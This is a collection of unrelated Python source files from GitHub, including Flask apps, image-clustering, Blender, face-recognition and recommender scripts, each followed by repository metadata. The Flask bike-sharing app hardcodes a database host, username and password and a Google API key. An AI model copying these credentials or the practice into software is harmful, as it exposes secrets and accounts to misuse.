# Обновление экземпляра модели с конвертированным файлом
converted_model.converted_file = 'converted_files/' + output_file_name
converted_model.converted_filename = output_file_name
converted_model.save()
except Exception as e:
converted_model.delete() # Удаляем запись при неудачной конвертации
return Response(str(e), status=status.HTTP_500_INTERNAL_SERVER_ERROR)
serializer.instance = converted_model
class ConvertedModelDetailView(RetrieveDestroyAPIView):
queryset = ConvertedModel.objects.all()
serializer_class = ConvertedModelSerializer
permission_classes = (IsAuthenticated,)
def get_queryset(self):
return self.queryset.filter(user=self.request.user)
| maxcrimea/ARSY | web/fileconverter/views.py | views.py | py | 3,589 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "rest_framework.generics.ListCreateAPIView",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "serializers.ConvertedModelSerializer",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "rest_framework.permissions.IsAuthenticated",
"line_number": 18... |
8400225965 | # Importamos tkinter
from tkinter import *
# Cargamos el modulo de Imagenes Pillow Python
from PIL import Image, ImageTk
# Creamos la ventana raiz
ventana = Tk()
ventana.title("Imagenes | Curso de master en Python")
ventana.geometry("700x500")
Label(ventana, text="Hola!!, Soy Lcdo. José Fernando Frugone Jaramillo").pack(anchor=CENTER)
dibujo = Image.open("./21-tkinter/imagenes/leon.jpg")
render = ImageTk.PhotoImage(dibujo)
Label(ventana, image=render).pack(anchor=CENTER)
ventana.mainloop()
| jfrugone1970/tkinter_python2020 | 21-tkinter/03-imagenes.py | 03-imagenes.py | py | 500 | python | es | code | 1 | github-code | 6 | [
{
"api_name": "PIL.Image.open",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "PIL.Image",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "PIL.ImageTk.PhotoImage",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "PIL.ImageTk",
"li... |
74221859388 | # Thanks to Ethan (@sherbondy) for the awesome idea of using CSG!
# Much slower than the other version, but it uses like 1/3 of the geometry
# Refactored version. slightly slower but more readable.
import bpy
import mathutils
bpy.ops.object.select_all(action='DESELECT')
pos = bpy.context.scene.cursor_location
bpy.ops.mesh.primitive_cube_add(view_align=False, enter_editmode=False)
iterator = bpy.context.active_object
iterator.name = 'Iterator'
bpy.ops.mesh.primitive_cube_add(view_align=False, enter_editmode=False)
menger = bpy.context.active_object
menger.name = 'MengerSponge'
def apply_modifier():
bpy.ops.object.modifier_add(type='BOOLEAN')
bpy.context.object.modifiers["Boolean"].operation = 'DIFFERENCE'
bpy.context.object.modifiers["Boolean"].object = bpy.data.objects["Iterator"]
bpy.ops.object.modifier_apply(apply_as='DATA', modifier="Boolean")
max_depth = 3
def cycle(array):
new_array = []
for i in range(len(array)):
new_array.append(array[(i+1)%len(array)])
return new_array
for depth in range (max_depth):
for i in range(3**depth):
for j in range(3**depth):
scale = [1.01, 1/3**(depth+1), 1/3**(depth+1)]
location = [0, -1+1/3**depth+2*i/3**depth, -1+1/3**depth+2*j/3**depth]
for k in range(3):
iterator.scale = scale
iterator.location = pos + mathutils.Vector(location)
apply_modifier()
scale = cycle(scale)
location = cycle(location)
bpy.ops.object.select_all(action='DESELECT')
iterator.select = True
bpy.ops.object.delete()
menger.select = True | elfakyn/Blender-iterated-fractals | menger_csg2.py | menger_csg2.py | py | 1,646 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "bpy.ops.object.select_all",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "bpy.ops",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "bpy.context",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "bpy.ops.mesh.pr... |
20445647795 | import os
import importlib.util
import time
print("Checking Dependencies")
if importlib.util.find_spec("tkinter") is None:
print("tkinter NOT INSTALLED,RUN pip install tkinter")
os.system("pause")
exit()
print("Dependencies OK")
time.sleep(5.5)
from os import path
from tkinter import filedialog
from tkinter import *
root = Tk()
root.withdraw()
print("Select Source Folder")
Source_Path = filedialog.askdirectory()
print("Source Path : ",Source_Path)
print("Select Destination Path")
Destination = filedialog.askdirectory()
print("Destination Path : ",Destination)
fileprfx = input("File Prefix :")
filetype = input("File Type (ex .doc .exe .png) :")
def main():
for count, filename in enumerate(os.listdir(Source_Path)):
dst = fileprfx + " " + str(count) + filetype
# rename all the files
os.rename(os.path.join(Source_Path, filename), os.path.join(Destination, dst))
# Driver Code
if __name__ == '__main__':
main() | JohnavonVincentius/FileRename | filerename.py | filerename.py | py | 1,010 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "importlib.util.util.find_spec",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "importlib.util.util",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "importlib.util",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "os... |
18425266806 | # from flask import Flask
from flask import Flask, render_template, request, redirect, url_for, session
import pymysql.cursors
import json
import pickle
from flask import jsonify
import sklearn
from flask_sqlalchemy import model
# Loading in the training models that we will be using later
bike_model = pickle.load(open('bikes_model.pkl', 'rb'))
stands_model = pickle.load(open('stands_model.pkl','rb'))
app = Flask(__name__)
# MySQL configuration
app.config['MYSQL_HOST'] = 'dbbikes.cvvkn6jkfbdf.eu-west-1.rds.amazonaws.com'
app.config['MYSQL_USER'] = 'SEGroup25'
app.config['MYSQL_PASSWORD'] = 'SEGroup25?'
app.config['MYSQL_DB'] = 'dbbikes'
app.config['MYSQL_PORT'] = 3306
# create a connection to the database
conn = pymysql.connect(
host=app.config['MYSQL_HOST'],
user=app.config['MYSQL_USER'],
password=app.config['MYSQL_PASSWORD'],
db=app.config['MYSQL_DB'],
port=app.config['MYSQL_PORT'],
cursorclass=pymysql.cursors.DictCursor
)
# Creating the route for the main page the user will access
@app.route('/')
def index():
# cursor that will execute the SQL query to the database
cursor = conn.cursor()
# Selecting the last 117 entries from the availability table
cursor.execute('SELECT * FROM availability ORDER BY last_update DESC LIMIT 117')
availability_results = cursor.fetchall()
# Selecting all the information from the stations table
cursor.execute('SELECT * FROM stations')
location_results = cursor.fetchall()
# Debugging code print statements to make sure the query executed successfully
print(availability_results)
print(location_results)
# Gathering station coordinate, name, and number values
locations = []
for location in location_results:
latitude = location['position_lat']
longitude = location['position_long']
name = location['stat_name']
number = location['number']
# Gathering available bike values and available bike stand values
bikes_available = None
for availability in availability_results:
if availability['number'] == location['number']:
bikes_available = availability['available_bikes']
bike_stands_available = availability['available_bike_stands']
break
# Adding each to the list locations
locations.append((latitude, longitude, bikes_available, name, bike_stands_available,number))
# Returning all information which will be used in conjunction with adding markers to a map and displaying window information
return render_template('index.html', API_KEY='AIzaSyCmEmTVXz4FLSsTM3JME9J3VW-WXECqmKw', locations=locations)
# Route for when the user wants to route from one station to another
@app.route('/mapping.html')
def map():
# Exact same code as the the previous route
cursor = conn.cursor()
cursor.execute('SELECT * FROM availability ORDER BY last_update DESC LIMIT 117')
availability_results = cursor.fetchall()
# Getting the locations
cursor.execute('SELECT * FROM stations')
location_results = cursor.fetchall()
print(availability_results)
print(location_results)
# extracting all the lat and long values
locations = []
for location in location_results:
latitude = location['position_lat']
longitude = location['position_long']
name = location['stat_name']
number = location['number']
bikes_available = None
for availability in availability_results:
if availability['number'] == location['number']:
bikes_available = availability['available_bikes']
bike_stands_available = availability['available_bike_stands']
break
locations.append((latitude, longitude, bikes_available, name, bike_stands_available,number))
return render_template('mapping.html', API_KEY='AIzaSyCmEmTVXz4FLSsTM3JME9J3VW-WXECqmKw', locations=locations)
# Route that will return the news portion of the site
@app.route('/news.html')
def news():
return render_template('news.html')
# Route that will return the how-to portion of the site
@app.route('/how-to.html')
def howto():
return render_template('how-to.html')
@app.route('/availability/<int:station_id>')
def predict_bikes(station_id):
from datetime import datetime
today = datetime.today()
dow,month = today.weekday(),today.month
predict_array = []
json_dict = {}
for h in range(24):
predict_array.append([station_id,month,h,0,99,99,99,99,dow])
results = bike_model.predict(predict_array).tolist()
for index,bikes in enumerate(results):
json_dict[index] = bikes
return json.dumps(json_dict)
@app.route('/standsavailability/<int:stand_id>')
def predict_stands(stand_id):
from datetime import datetime
today = datetime.today()
dow,month = today.weekday(),today.month
predict_array = []
json_dict = {}
for h in range(24):
predict_array.append([stand_id,month,h,0,99,99,99,99,dow])
results = stands_model.predict(predict_array).tolist()
for index,stands in enumerate(results):
json_dict[index] = stands
return json.dumps(json_dict)
# Start the application
if __name__ == "__main__":
app.run(host ="0.0.0.0", port =8080, debug = True)
| Winnie901/Software-Engineering-Project-Git5 | app.py | app.py | py | 5,366 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "pickle.load",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "pickle.load",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "flask.Flask",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "pymysql.cursors.connect",
"li... |
41681774832 | import cv2
import numpy as np
import time
import matplotlib.pyplot as plt
plt.rcParams['font.sans-serif']=['SimHei']
plt.rcParams['axes.unicode_minus']=False
m=2
# 初始化隶属度矩阵U
def Initial_U(sample_num, cluster_n):
# sample_num为样本个数, cluster_n为分类数
U = np.random.rand(cluster_n,sample_num)
# 对 U 按列求和,然后取倒数
col_sum = np.sum(U, axis=0)
col_sum = 1 / col_sum
# 确保 U 的每列和为1
U = np.multiply(U, col_sum)
return U
# 计算类中心
def Cen_Iter( data, U, cluster_n):
# 初始化中心点
center = np.zeros(cluster_n)
for i in range(0, cluster_n):
# 根据迭代公式进行计算
u_ij_m = U[i, :] ** m
sum_u = np.sum(u_ij_m)
# 矩阵乘法
ux = np.dot(u_ij_m, data)
center[i] = ux / sum_u
return center
# 更新隶属度矩阵
def U_Iter(data,U, c):
cluster_n,sample_num = U.shape
for i in range(0, cluster_n):
for j in range(0,sample_num):
sum = 0
# 根据隶属度矩阵迭代公式计算
for k in range(0, cluster_n):
temp = (np.linalg.norm(data[j] - c[i]) /
np.linalg.norm(data[j] - c[k])) ** (2 / (m - 1))
sum = temp + sum
U[i, j] = 1 / sum
return U
def FCM(img_path,cluster_n=5,iter_num=10): # 迭代次数默认为10
# 读入灰度图像
start = time.time()
img=cv2.imread(img_path,0)
# 将图片拉成一列
data=img.reshape(img.shape[0]*img.shape[1],1)
print("开始聚类")
sample_num = len(data)
# 初始化隶属度矩阵U
U = Initial_U(sample_num, cluster_n)
for i in range(0, iter_num):
C = Cen_Iter(data, U, cluster_n)
U = U_Iter(data,U, C)
print("第%d次迭代" % (i + 1), end="")
print("聚类中心", C)
# 分类标签
label = np.argmax(U, axis=0)
# 最后的类中心矩阵
center = C
print("聚类完成,开始生成图片")
# 根据聚类结果和聚类中心构建新图像
new_img=center[label]
# 矩阵转成原来图片的形状
new_img=np.reshape(new_img,img.shape)
# 要变成图像得数据得转换成uint8
new_img=new_img.astype('uint8')
plt.subplot(121)
plt.imshow(img, cmap="gray")
plt.title("原图")
plt.axis('off')
plt.subplot(122)
plt.imshow(new_img, cmap="gray")
plt.title("FCM,%d个聚类中心"%cluster_n)
plt.axis('off')
end = time.time()
print("循环运行时间:%.2f秒" % (end - start))
plt.show()
plt.imshow(new_img, cmap="gray")
plt.axis('off')
plt.savefig('FCM_Baboon')
FCM("photo2.png",cluster_n=4)
| LAS1520/Image-Processing | final pj/codes/FCM.py | FCM.py | py | 2,715 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "matplotlib.pyplot.rcParams",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.rcParams",
"line_number": 6,
"usage_type": "attribute"
},
{
"ap... |
14524764116 | import random
from itertools import combinations
from ltga.Mutation import Mutation
class LTGA(object):
def buildTree(self, distance):
clusters = [(i,) for i in range(len(self.individuals[0].genes))]
subtrees = [(i,) for i in range(len(self.individuals[0].genes))]
random.shuffle(clusters)
random.shuffle(subtrees)
lookup = {}
def allLowest():
minVal = 3
results = []
for c1, c2 in combinations(clusters, 2):
result = distance(self.individuals, c1, c2, lookup)
if result < minVal:
minVal = result
results = [(c1, c2)]
if result == minVal:
results.append((c1, c2))
return results
while len(clusters) > 1:
c1, c2 = random.choice(allLowest())
clusters.remove(c1)
clusters.remove(c2)
combined = c1 + c2
clusters.append(combined)
if len(clusters) != 1:
subtrees.append(combined)
return subtrees
def smallestFirst(self, subtrees):
return sorted(subtrees, key=len)
def generate(self, initialPopulation, evaluator, distanceFcn, crossoverFcn):
self.individuals = initialPopulation
distance = distanceFcn
ordering = self.smallestFirst
crossover = crossoverFcn
beforeGenerationSet = set(self.individuals)
while True:
subtrees = self.buildTree(distance)
masks = ordering(subtrees)
generator = crossover(self.individuals, masks)
individual = next(generator)
while True:
fitness = yield individual
try:
individual = generator.send(fitness)
except StopIteration:
break
self.individuals = Mutation(evaluator).mutate(self.individuals)
#If all individuals are identical
currentSet = set(self.individuals)
if (len(currentSet) == 1 or
currentSet == beforeGenerationSet):
break
beforeGenerationSet = currentSet
| Duzhinsky/scheduling | ltga/LTGA.py | LTGA.py | py | 2,220 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "random.shuffle",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "random.shuffle",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "itertools.combinations",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "random.choice",
... |
8954419715 | import requests,urllib
import os,sys,re,zipfile,shutil,io
from bs4 import BeautifulSoup
cwd = os.getcwd()
# taking the movie input
movie_name = [s for s in re.split("[^0-9a-zA-Z]",input("enter the movie name : \n"))]
movie_name = list(filter(lambda a: a != '', movie_name))
m1 = ' '.join(map(str,movie_name))
encodings = []
while len(encodings) == 0:
encodings = [s.lower() for s in re.split("[^0-9a-zA-Z]",input("enter the storage format (eg.720p,bluray,brrip,xvid,hdtv etc) (must) \n"))]
if len(encodings) == 0 :
print("You must enter some encoding format")
encodings = list(filter(lambda a: a != '', encodings))
m2 = ' '.join(map(str,encodings))
m1 = m1 + ' ' + m2
print("you have searched for \n",m1)
search_string = m1.split()
#search_string
''' Preparing the query '''
search_url = "https://subscene.com/subtitles/title?q="
search_url += search_string[0]
for words in search_string[1:]:
search_url += ("+" + words)
search_url += "&l="
print(search_url)
r = requests.get(search_url)
soup = BeautifulSoup(r.content,"lxml")
#print(soup)
subs = soup.find_all("td", class_ = "a1")
#print(subs)
for elements in range(len(subs)) :
res = subs[elements].find_all("span", class_="l r positive-icon")
s = str(res)
m = re.search('English',s)
if m :
target = subs[elements]
t = target.find("a")
download_link = t['href']
break
# download that link
r1 = requests.get("https://subscene.com" + download_link)
soup = BeautifulSoup(r1.content,"lxml")
download = soup.find_all('a',attrs={'id':'downloadButton'})[0].get("href")
#print(download)
r2 = requests.get("http://subscene.com" + download)
download_link = r2.url
#print(r2.encoding)
#print(file_path)
f = requests.get(download_link)
zipped = zipfile.ZipFile(io.BytesIO(f.content))
zipped.extractall()
print("subtitles downloaded succesfully")
| styx97/movie_subs | movie_subs.py | movie_subs.py | py | 1,880 | python | en | code | 4 | github-code | 6 | [
{
"api_name": "os.getcwd",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "re.split",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "re.split",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 40,
... |
5104206621 | import os
import cv2
import numpy as np
import faceRecognition as fr
import HumanDetection as hd
import time
from playsound import playsound
#variabel status ruangan. 0 = empty, 1 = uknown, 2 = known
status = 0
#variabel timestamp
tsk = [0,0,0,False] #untuk durasi status known, mendeteksi ruang kosong (isempty)
tsu = [0,0,0,False] #untuk durasi status unkown
#Merupakan bagian untuk load data training dan capture video dari sumber
face_recognizer = cv2.face.LBPHFaceRecognizer_create()
face_recognizer.read('trainingData.yml')#Load data training yang sudah tersimpan sebelumnya
name = {0 : "TestImages", 1 : "Ronalod", 2 : "Faruq", 3 : "Fadhil", 4 : "Unknown"}
#Nama Video untuk presentasi final
# known1 -> known, isempty
# coba14 -> unknown alarm
# coba 16 -> unknown alarm
# CekFadhilFaruqNaila1 -> deteksi beberapa orang sekaligus
filename = '\coba16'
hog = hd.initiate()
cap=cv2.VideoCapture('D:\Bahan Kuliah\PyCharm Projects\FaceRecog\Video'+ filename +'.mp4')
fps_read = cap.get(cv2.CAP_PROP_FPS)
print("Input Video FPS :",fps_read)
height = int( cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
print("Input Video Frame Size : ",width," x ",height)
out = cv2.VideoWriter(
'output '+ 'coba16' +'.avi',
cv2.VideoWriter_fourcc(*'MJPG'),
fps_read,
(640,480))
while (cap.isOpened()):
ret,test_img=cap.read()#capture frame dari video dan mengembalikan 2 nilai yaitu gambar dan nilai boolean dari gambar
if ret :
# Resizing Image for faster detection
resized_img = cv2.resize(test_img, (640, 480))
#resized_img = test_img
timer = cv2.getTickCount()
if status == 0 or status == 1: #apabila status sebelumnya empty atau unknown
faces_detected,gray_img=fr.faceDetection(resized_img)
#print("faces_detected:",faces_detected)
for (x,y,w,h) in faces_detected:
cv2.rectangle(resized_img,(x,y),(x+w,y+h),(0,0,255),thickness=2) #menggambar kotak untuk wajah
#cv2.imshow('face detection Tutorial ',resized_img)
for face in faces_detected:
(x,y,w,h)=face
roi_gray=gray_img[y:y+w, x:x+h]
label,confidence=face_recognizer.predict(roi_gray)#Memprediksi identitas wajah
print("confidence:",confidence)
print("label:",label)
fr.draw_rect(resized_img,face)
predicted_name=name[label]
if confidence < 80: #Jika confidence kecil dari 80 maka print identitas wajah
fr.put_text(resized_img,predicted_name,x,y)
status = 2 #ubah status jadi known
else:
predicted_name=name[4]
fr.put_text(resized_img,predicted_name,x,y)
status = 1 #ubah status jadi uknown
if status == 0 or status == 1 :
regions = hd.detect(hog, resized_img, (4,4), (4, 4), 1.2)
hd.boxes(resized_img, regions)
if len(regions) !=0 : #terdeteksi manusia
if status == 0 :
status = 1
print('Human Detected')
#update durasi
if tsu[3] == False:
tsu[0] = time.time()
tsu[3] = True
elif tsu[3] == True:
tsu[1] = time.time()
tsu[2] = tsu[1] - tsu[0]
tsk = [0, 0, 0, False]
if status == 2 :
tsu =[0,0,0,False] #reset
regions = hd.detect(hog, resized_img, (4,4), (4, 4), 1.2)
hd.boxes(resized_img, regions)
if len(regions) == 0:
print('Human Not Detected')
if tsk[3] == False:
tsk[0] = time.time()
tsk[3] = True
elif tsk[3] == True:
tsk[1] = time.time()
tsk[2] = tsk[1] - tsk[0]
else :
tsk = [0,0,0,False] #reset bila terdeteksi manusia
# showing fps
cv2.putText(resized_img, "Fps:", (20, 40), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 0, 255), 2);
fps = cv2.getTickFrequency() / (cv2.getTickCount() - timer); cv2.putText(resized_img, str(int(fps)), (75, 40), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2);
# ubah durasi
tsu[2] = tsu[2]*(fps/fps_read)
tsk[2] = tsk[2]*(fps/fps_read)
if status == 1: # status unknown
print("Waktu terdeteksi : ")
print(tsu, '\n')
if tsu[2] >= 10: # durasi terdeteksi melebihi 10 detik
print("alarm triggered!")
playsound("Industrial Alarm.wav")
break # keluar program
if status == 2:
print("Waktu tidak terdeteksi : ")
print(tsk, '\n')
if tsk[2] >= 2: # misal tidak terdeteksi (kosong) selama 5 detik
print("Reset Status menjadi 0")
status = 0 # ubah status jadi empty
cv2.imshow('face recognition tutorial ',resized_img)
print("Status : ",status)
out.write(resized_img.astype('uint8'))
if cv2.waitKey(1) & 0xFF == ord('q'):
# Tekan q untuk menghentikan atau tunggu hingga akhir video
break
else :
break
cap.release()
out.release()
cv2.destroyAllWindows()
print('Waktu awal terdeteksi : ', tsu[0], '\n')
print('Waktu akhir terdeteksi : ', tsu[1], '\n')
print('Durasi terdeteksi : ', tsu[2],' detik','\n')
print('Waktu awal tidak terdeteksi : ', tsk[0], '\n')
print('Waktu akhir tidak terdeteksi : ', tsk[1], '\n')
print('Durasi tidak terdeteksi : ', tsk[2],' detik','\n')
if tsu[2] >=10:
print ("Alarm Triggered!")
playsound("Industrial Alarm.wav")
print("Alarm Triggered!")
playsound("Industrial Alarm.wav") | AfifHM/Smart-CCTV-Using-Face-and-Human-Detection | FullProgram/Source Code/forVideo.py | forVideo.py | py | 5,897 | python | en | code | 5 | github-code | 6 | [
{
"api_name": "cv2.face.LBPHFaceRecognizer_create",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "cv2.face",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "HumanDetection.initiate",
"line_number": 26,
"usage_type": "call"
},
{
"api_name... |
71091610109 | root_path = '/mnt/d/KLTN/CNN-Based-Image-Inpainting/'
train_glob = root_path + 'dataset/places2/train/*/*/*.jpg'
test_glob = root_path + 'dataset/places2/test/*.jpg'
mask_glob = root_path + 'dataset/irregular_mask1/*.png' #2 for partialconv
log_dir = root_path + 'training_logs'
save_dir = root_path + 'models'
checkpoint_path = root_path + "models/gatedconv.pth"
learning_rate = 1e-4 #5e-4 for gated conv
epoch = 50
train_batch_size = 4
test_batch_size = 4
log_interval = -1 #no log
import os
import torch
from dataloader.dataset import *
from gatedconvworker.gatedconvworker import GatedConvWorker
print("Creating output directories")
if not os.path.exists(save_dir):
os.makedirs(save_dir)
if not os.path.exists(log_dir):
os.makedirs(log_dir)
print("Initiating training sequence")
torch.cuda.empty_cache()
print("Initializing dataset with globs:", train_glob, test_glob, mask_glob)
data_train = Dataset(train_glob, mask_glob, False)
data_test = Dataset(test_glob, mask_glob, False)
worker = GatedConvWorker(checkpoint_path, learning_rate)
worker.Train(epoch, train_batch_size, test_batch_size, data_train, data_test, log_interval)
| realphamanhtuan/CNN-Based-Image-Inpainting | traingatedconv.py | traingatedconv.py | py | 1,142 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "os.path.exists",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "os.makedirs",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_nu... |
7874634889 | import numpy as np
import json
import os
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
class LatentConverter():
def __init__(self, places_path):
place_list = []
place2idx = {}
with open(places_path, encoding='utf-8') as f:
for p_idx, place in enumerate(json.load(f)):
place = tuple(place)
place2idx[place] = p_idx
place_list.append(place)
self.places_path = places_path
self.place_len = len(place_list)
self.place_list = place_list
self.place2idx = place2idx
def get_normalized(self, reviewer_path):
with open(reviewer_path, encoding='utf-8') as f:
review_list = json.load(f)
stars_dict = {}
for review in review_list:
place = (review['place'], review['address'])
if place in self.place2idx:
stars_dict[place] = review['stars']
if len(stars_dict)==0:
print('Reviewer "' + reviewer_path + '":\n\tNone of the reviews overlaps with "' + self.places_path + '"')
mean, std = 0, 0
else:
stars_list = list(stars_dict.values())
mean, std = np.mean(stars_list), np.std(stars_list)
normalized = np.zeros(self.place_len)
for p_idx, place in enumerate(self.place_list):
if std==0:
normalized[p_idx] = 0
else:
normalized[p_idx] = (stars_dict[place]-mean)/std if place in stars_dict else 0
return normalized
def gen_proj(self, guides_normalized, latent_dim=20):
u, s, vh = np.linalg.svd(guides_normalized)
print('gen_proj: The first', latent_dim, 'latent dimensions are taken.')
print('Singular values:\n', s)
# guides_smoothed = np.matmul(np.matmul(u[:,:20], np.diag(s[:20])), vh[:20,:])
# print('Smoothed:\n', guides_smoothed)
# # for debug use
# guides_normalized = guides_normalized.transpose()
# guides_smoothed = guides_smoothed.transpose()
return u[:,:latent_dim].transpose()
def get_latent(self, proj, reviewer_path):
return np.matmul(proj, self.get_normalized(reviewer_path))
@staticmethod
def visualize(guides_latent, dims=(0,1,2)):
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
X = guides_latent[dims[0],:]
Y = guides_latent[dims[1],:]
Z = guides_latent[dims[2],:]
ax.scatter(X, Y, Z)
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_zlabel('Z')
plt.show()
class ReviewReader():
def __init__(self, guides_path, reviews_path):
self.reviews_path = reviews_path
# guide_list[<number>] = <guide ID>
guide_list = []
with open(guides_path, encoding='utf-8') as f:
for i in f:
guide_list.append(i[:-1])
self.guide_len = len(guide_list)
# guide_file_dict[<guide ID>] = <file name>
guide_file_dict = {}
for i in os.listdir(reviews_path):
guide_file_dict[i.split()[2].split('=')[1].split('.')[0]] = i
# file_mame[<number>] = <file name>
file_mame = []
for num in range(len(guide_list)):
file_mame.append(guide_file_dict[guide_list[num]])
self.file_name = file_mame
def getPath(self, guideNum):
return os.path.join(self.reviews_path, self.file_name[guideNum])
def getReviews(self, guideNum):
with open(self.getPath(guideNum), encoding='utf-8') as f:
review_list = json.load(f)
return review_list
if __name__ == '__main__':
# initialize with a list of places
lc = LatentConverter('places.json')
# get reviews
rr = ReviewReader('guides.txt', '../data/reviews_guide')
# generate all normalized vectors
guides_normalized = np.zeros((lc.place_len, rr.guide_len))
for g_idx in range(rr.guide_len):
guides_normalized[:,g_idx] = lc.get_normalized(rr.getPath(g_idx))
# generate projection matrix
proj = lc.gen_proj(guides_normalized, latent_dim=20)
# project guides
guides_latent = np.matmul(proj, guides_normalized)
# save for future use
np.save('guides_normalized.npy', guides_normalized)
np.save('proj.npy', proj)
np.save('guides_latent.npy', guides_latent)
def example_get_latent():
# initialize with a list of places
lc = LatentConverter('places.json')
# load projection matrix
proj = np.load('proj.npy')
# get latent vector
return lc.get_latent(proj, '../data/reviews_guide/reviews_guide length=117 guideID=107297262039687837164.json')
def example_visualize():
# visualize the 0th, 1st, and 2nd latent dimension
LatentConverter.visualize(np.load('guides_latent.npy'), dims=(0,1,2))
| e841018/DinnerSelector | preprocessing/LSI.py | LSI.py | py | 4,229 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "json.load",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "json.load",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "numpy.mean",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "numpy.std",
"line_number": 36,
... |
19400757649 | import os
import sys
import unittest
import logging
from datetime import datetime
import json
from flask import Flask, request
from flask_restful import Resource
import settings as CONST
curpath = os.path.dirname(__file__)
sys.path.append(os.path.abspath(os.path.join (curpath, "../")))
from app_models import Customer
from app_utils import MongoRepository, DbEntity
class CustomerAPI(Resource):
def __init__(self):
#Create and configure logger
logfile= os.path.abspath("{0}/{1}".format(CONST.log_settings["log_folder"], CONST.log_settings["log_file"]))
os.makedirs( os.path.dirname(logfile), exist_ok=True)
logging.basicConfig(
filename=logfile,
format='%(asctime)s %(message)s',
filemode='a'
)
#Creating an object
self.logger=logging.getLogger()
#Setting the threshold of logger to DEBUG
self.logger.setLevel(CONST.log_settings["log_level"])
self.entity = "customers"
self.repo = MongoRepository(logger=self.logger,
server=CONST.db_customer["url"],
port=CONST.db_customer["port"],
database=CONST.db_customer["db"],
collection=self.entity,
session_id=1)
###########################################################################
# GET /customers
# GET /customers/1
def get(self,id=None):
'''
Used to read one records
'''
if id:
msg = 'Processing request to get {0} with id:{1}'.format(self.entity, id)
self.logger.debug(msg)
else:
msg = 'Processing request to get all {0}'.format(self.entity)
self.logger.debug(msg)
try:
if id:
records = self.repo.find_by_id(id)
else:
records = [c for c in self.repo.fetchall()]
return json.dumps(records), 200
except Exception as e:
msg = 'Error in processing GET request.', str(e)
self.logger.error(msg)
return { 'status' : 'error' }, 500
###########################################################################
# POST /customers
def post(self):
'''
Used to create entity
'''
self.logger.debug('Processing POST request')
if not request.data:
msg = "Request to create entity needs to come with form 'data' "
self.logger.error(msg)
return {
'status' : 'error',
'msg' : msg
}, 400
try:
entity = Customer( json=json.loads(request.data) )
wellformed, msg = entity.isValid()
if not wellformed:
self.logger.error(msg)
return {
'status' : 'error',
'msg' : msg
}, 400
result = self.repo.create(entity)
return { 'status' : 'success' }, 200
except Exception as e:
msg = 'Error in processing POST request.', str(e)
self.logger.error(msg)
return { 'status' : 'error' }, 500
###########################################################################
# PUT /customers/id
def put(self, id=None):
'''
Used for update
'''
if (not id) or (not request.data):
msg = "Request to update entity needs to come for a specific entity id and 'data' "
self.logger.error(msg)
return {
'status' : 'error',
'msg' : msg
}, 400
msg = 'Processing request to update entity:{0} with id:{1}'.format(self.entity, id)
try:
entity = Customer( json=json.loads(request.data) )
wellformed, msg = entity.isValid()
if not wellformed:
self.logger.error(msg)
return {
'status' : 'error',
'msg' : msg
}, 400
result = self.repo.update_by_id(id,entity)
return { 'status' : 'success' }, 200
except Exception as e:
msg = 'Error in processing PUT request.', str(e)
self.logger.error(msg)
return { 'status' : 'error' }, 500
###########################################################################
# DELETE /customers/id
def delete(self, id):
'''
Used for update
'''
msg = 'Processing request to delete entity:{0} with id:{1}'.format(self.entity, id)
self.logger.debug(msg)
try:
result = self.repo.delete_by_id(id)
return { 'status' : 'success' }, 200
except Exception as e:
msg = 'Error in processing DELETE request.', str(e)
self.logger.error(msg)
return { 'status' : 'error' }, 500
###########################################################################
############################################################################### | bbcCorp/py_microservices | src/flask_api_customers/customers.py | customers.py | py | 5,316 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "os.path.dirname",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "sys.path.append",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_num... |
23500788401 | from alipy.index import IndexCollection
from alipy.experiment import State
from alipy.data_manipulate import split
from sklearn.preprocessing import StandardScaler
def cancel_step(select_ind, lab, unlab):
lab = IndexCollection(lab)
unlab = IndexCollection(unlab)
